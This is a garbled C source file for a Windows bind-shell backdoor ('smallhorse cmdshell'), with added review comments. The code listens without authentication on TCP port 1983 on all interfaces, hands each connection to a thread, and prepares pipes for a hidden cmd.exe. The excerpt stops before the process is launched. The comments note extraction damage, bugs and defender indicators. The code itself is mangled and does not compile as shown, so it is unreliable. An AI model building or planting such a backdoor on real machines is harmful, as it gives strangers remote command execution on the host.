Simple cmdshell source code


/* Windows bind-shell ("smallhorse cmdshell v0.1"): a listener that hands every
 * inbound TCP connection to a worker thread wired to a hidden cmd.exe. This
 * file is an extraction-mangled paste: the #include targets are missing,
 * identifier case is scrambled (Printf/RETURN/SLEEP), and the "\n"/"\t"
 * escapes in the string literals survive as "/ n" and "/ t". The tokens below
 * are kept exactly as shown; only comments are added, so the text still does
 * not compile in this form.
 *
 * `port` is the TCP port the listener binds to (default 1983, overridable
 * with -p according to the usage banner). `Clientthread` is the prototype of
 * the per-connection worker defined further down.
 *
 * help(): prints the usage banner and returns. As extracted, the second call
 * reads `Printf (" | | "|" SMALLHORSE's ...` -- two adjacent string literals
 * joined by `|`, which does not parse; presumably an escaped or doubled quote
 * was lost in extraction. None of the banner strings contain format
 * directives, so the call pattern itself carries no format-string risk. */
#include #include #pragma Comment (lib, "ws2_32.lib") int port = 1983; DWORD WINAPI Clientthread (LPVOID LPPAR); void help () {printf ("/ ** ************************** / // n "); Printf (" | | "|" SMALLHORSE's First cmdshell v0.1 | / n "); Printf (" | THANKS for Using it! / N "); Printf (" | | | | | | | | | | | | | | | | | | | | **** ************************* | / N "); Printf (" | | usage: smallhorse [- P port] | / n "); Printf (" | port: port number to listen on | / n "); Printf (" | DEFAULT port IS 1983 | / N "); printf (" // ***** *********************** // n "); return;}

/* OpenDoor(): the listener half of the tool. It starts Winsock 2.2, opens a
 * TCP socket, binds it to INADDR_ANY (every local interface) on the global
 * `port`, listens with a backlog of 5, and then loops forever: each accepted
 * connection is sent a greeting banner and passed to ClientThread. Nothing
 * between accept() and the CreateThread call authenticates the peer, so any
 * host that can reach the port is handed whatever ClientThread provides.
 *
 * Defender's view: the observable artefacts are a process holding an
 * unexpected listening socket (default TCP 1983) plus, per connection, a
 * hidden cmd.exe child whose standard handles are pipes rather than a
 * console -- the classic bind-shell shape for host firewall and
 * process-creation monitoring.
 *
 * Extraction note: this excerpt lost its line breaks, so on each physical
 * line below everything after a `//` is a comment as printed (the
 * declarations and the WSAStartup call on the first line, the whole of the
 * second line, and the tail of the third). Tokens are untouched here.
 * Also visible on the first line: `if (iResult =! NO_ERROR)` assigns rather
 * than compares as written (presumably `!=` in the original), and the local
 * `i` is declared but never used. */
void OpenDoor () {// initialize Winsock WSADATA wsaData;. SOCKET m_socket, AcceptClient; sockaddr_in Service, Client; int ClientSize, i = 0; int iResult = WSAStartup (MAKEWORD (2,2), & wsaData); if (iResult =! NO_ERROR) RETURN;
/* Entirely swallowed by its leading `//` as extracted. In the original it
 * created the socket (AF_INET, SOCK_STREAM, IPPROTO_TCP), bailed out on
 * SOCKET_ERROR, and filled `Service` with AF_INET / htonl(INADDR_ANY) /
 * htons(port). */
// Create a socket m_socket = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);. If (m_socket == SOCKET_ERROR) return; Service.sin_family = AF_INET; Service.sin_addr.s_addr = htonl (INADDR_ANY); Service.sin_port = htons (port );
/* bind / listen / accept loop, followed on the same extracted line by the
 * start of ClientThread. Points a reviewer would raise on the loop:
 *  - CreateThread is given `&AcceptClient`, the address of one local SOCKET
 *    that the next accept() overwrites; the trailing Sleep(1000) looks like
 *    the only thing separating the worker's read of *lpParam from that
 *    overwrite, i.e. a timing assumption rather than a guarantee.
 *  - The send() of the greeting banner is unchecked; CreateThread failure is
 *    only printed and the accepted socket is then never closed.
 *  - The `Printf "/ NSMALLHORSE ..." , port)` call has lost its opening
 *    parenthesis in extraction; `/ / Bond` is a mangled `// Bind`.
 * ClientThread(lpParam) begins at `DWORD WINAPI ClientThread` on this line:
 * it dereferences lpParam as a pointer to the listener's SOCKET and sets up
 * SECURITY_ATTRIBUTES with bInheritHandle = TRUE (so the pipes created next
 * can be inherited by a child process). Its body continues past the end of
 * this excerpt and is not reviewed here. */
IF (bind (m_socket, (sockaddr *) & service, sizeof (service)) == SOCKET_ERROR) RETURN; / / Bond IF (Listen (M_Socket, 5) == Socket_ERROR) Return; // Maximum Monitor Column 5 Printf "/ NSMALLHORSE LISTEN ON Port:% D ... ^ * ^ / n", port); clientsize = sizeof (client); while (1) {acceptclient = accept (m_socket, (sockaddr *) & client, & clientsize; if (Acceptclient == Socket_ERROR) RETURN; // Accept the connection printf ("Client Connected./N"); char * sendbuf = "/ ********************** ***************** /// n / tthanks for use ... / n / tsmallhorse's cmdshell! / n / tgood luck! / n // ***** ********************************* // n / n "; send (AcceptClient, Sendbuf, Strlen (SendBuf) ), 0); if (Createthread (NULL, 0, ClientthRead, (LPVOID) & AcceptClient, 0, NULL) == NULL) Printf ("Create Thread Error! / N"); SLEEP (1000);} wsacleanup (); return;} DWORD WINAPI ClientThread (LPVOID lpParam) {int ret; char Buf [1024]; HANDLE Rpipe, Wpipe, Wfile, Rfile; SOCKET acceptClient = (SOCKET) * (SOCKET *) lpParam; SECURITY_ATTRIBUTES sa; sa.nLength = sizeof (sa) ; sa.binherithandle = true; sa.lpsecurityDescriptor = null;

RET = CreatePipe (& RPIPE, & RILE, & SA, 0); RET = CREATEPIPE (& WFile, & Wpipe, & Sa, 0); // Establish two pipes, used to receive commands and display results, respectively

STARTUPINFO startinfo; GetStartupInfo (& startinfo); startinfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; startinfo.hStdInput = Wfile; startinfo.hStdError = startinfo.hStdOutput = Rfile; startinfo.wShowWindow = SW_HIDE;

Char cmdline [max_path]; getSystemDirectory (cmdline, max_path); strcat (cmdline, ("// cmd.exe"));

